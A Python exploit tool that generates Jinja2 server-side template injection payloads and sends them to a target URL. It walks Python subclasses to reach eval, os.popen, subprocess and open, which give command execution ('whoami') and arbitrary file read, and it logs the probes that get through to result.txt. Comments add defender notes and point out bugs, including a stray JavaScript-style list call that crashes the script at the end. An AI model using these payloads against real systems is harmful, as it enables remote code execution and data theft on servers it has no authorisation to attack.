from flask import Flask, request
from jinja2 import Template
from threading import Thread
import requests
import os
# Base URL of the local test target (127.0.0.1:5000). The `404_url` query
# parameter is the injection point every generated probe is appended to.
site = "http://127.0.0.1:5000/waewe?404_url="
# One bucket per technique. scan() appends candidate URLs here and
# check_active() consumes them; the keys must match those of scan_list.
url_dict = {
"popen": [],
"eval": [],
"__import__": [],
"subprocess": [],
}
# Fixed ("通用" = generic) Jinja2 SSTI probes, written to result.txt verbatim
# without being sent. Each walks `[].__class__.__base__.__subclasses__()` to
# locate `catch_warnings` and reach `__builtins__` via `__init__.__globals__`.
# Labels: "rce" = command execution, "任意文件读取" = arbitrary file read
# (utf-8 / gbk decoding variants; 'filename' is a placeholder to be replaced).
# Defender note: the `__class__.__base__.__subclasses__()` / `__globals__`
# sequence inside a request parameter is a high-signal log/WAF indicator, and
# the underlying flaw is rendering user input as template source
# (e.g. Template(user_string)) instead of passing it as a template variable.
currency_url = [
"通用payload_rce: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('whoami').read()\") }}{% endif %}{% endfor %}\n",
"通用payload_任意文件读取_utf8: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r', encoding='utf-8').read() }}{% endif %}{% endfor %}\n",
"通用payload_任意文件读取_gbk: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r', encoding='gbk').read() }}{% endif %}{% endfor %}\n"
]
# technique -> (attribute path, call suffix). scan() evaluates the path on
# each local subclass to test whether the key (e.g. "popen") is present in
# that namespace, and then emits path + suffix as the template expression.
scan_list = {
"popen": ("__init__.__globals__", "['popen']('whoami').read()"),
"eval": ("__init__.__globals__['__builtins__']", "['eval'](\"__import__('os').popen('whoami').read()\")"),
"__import__": ("__init__.__globals__['__builtins__']", "['__import__']('os').system('whoami')"),
"subprocess": ("__init__.__globals__", "['subprocess'].check_output('whoami', shell=True).decode('gbk')"),
}
def scan():
    """Fill url_dict with one probe URL per technique for each usable subclass.

    Walks the subclasses of ``object`` (the base of ``str``) in the *local*
    interpreter and records the list index of every class whose namespace
    (per the path in scan_list) contains the technique's key. The index is
    baked into the URL, so it is only meaningful if the target runs a
    comparable interpreter and import set; check_active() has to confirm it.

    Side effects: appends to the module-level url_dict. Returns nothing.
    """
    num = 0  # index into the local __subclasses__() list, mirrored into the URL
    for item in "".__class__.__base__.__subclasses__():
        try:
            for ii in scan_list:
                # NOTE(review): eval() on a string assembled from the trusted
                # constants in scan_list -- not user input here, but
                # getattr()/operator.attrgetter would avoid eval entirely.
                if ii in eval("item." + scan_list[ii][0]):
                    url = "%s{{{}.__class__.__base__.__subclasses__()[%s].%s%s}}\n" % (
                        site,
                        num,
                        scan_list[ii][0],
                        scan_list[ii][1]
                    )
                    url_dict[ii].append(url)
            # Assumed placement (the source's indentation was flattened):
            # advance once per subclass so `num` stays aligned with the list.
            num += 1
        # The bare except keeps `num` in step when the attribute path does not
        # exist on a class, but it also abandons the remaining techniques for
        # that class on the first error and swallows everything else,
        # including KeyboardInterrupt.
        except:
            num += 1
def check_active(url, desc):
    """Request each URL in ``url`` and append the non-5xx ones to result.txt.

    Args:
        url: list of probe URLs for one technique (a url_dict bucket).
        desc: technique label (the url_dict key) written in front of each hit.

    Every URL already ends with a newline (added in scan()), so no separator
    is written here. The acceptance test is only ``status_code < 500``, so
    4xx responses are recorded too: result.txt is a candidate list, not a set
    of confirmed results. Several threads append to the same file at once, so
    output from different buckets may interleave.
    """
    with open("result.txt", "a", encoding="utf-8") as f:
        for i in url:
            # No timeout: a stalled target blocks this thread (and the join
            # in main) indefinitely. Request errors are not caught, so one
            # failure ends the whole bucket.
            status_code = requests.get(i).status_code
            if not status_code >= 500:
                f.write("利用" + desc + ": " + i)
if __name__ == '__main__':
    print("开始构造.....")  # "starting construction"
    scan()
    # Start from a clean result file, then seed it with the fixed probes
    # (these are written only, never sent).
    if os.path.exists("result.txt"):
        os.remove("result.txt")
    with open("result.txt", "a", encoding="utf-8") as f:
        for i in currency_url:
            f.write(i)
    # One thread per technique bucket; all of them append to result.txt.
    t_list = []
    for i in url_dict:
        t = Thread(target=check_active, args=(url_dict[i], i,))
        t.start()
        t_list.append(t)
    for t in t_list:
        t.join()
    # BUG: Python lists have no .slice() method (JavaScript idiom). This line
    # raises AttributeError once the threads have finished, so the closing
    # message below is never printed; result.txt is already complete by then.
    [1,2,3].slice(0,0)
    print("创建完成,请查看当前路径下的 result.txt 文件!!")  # "done, see result.txt in the current directory"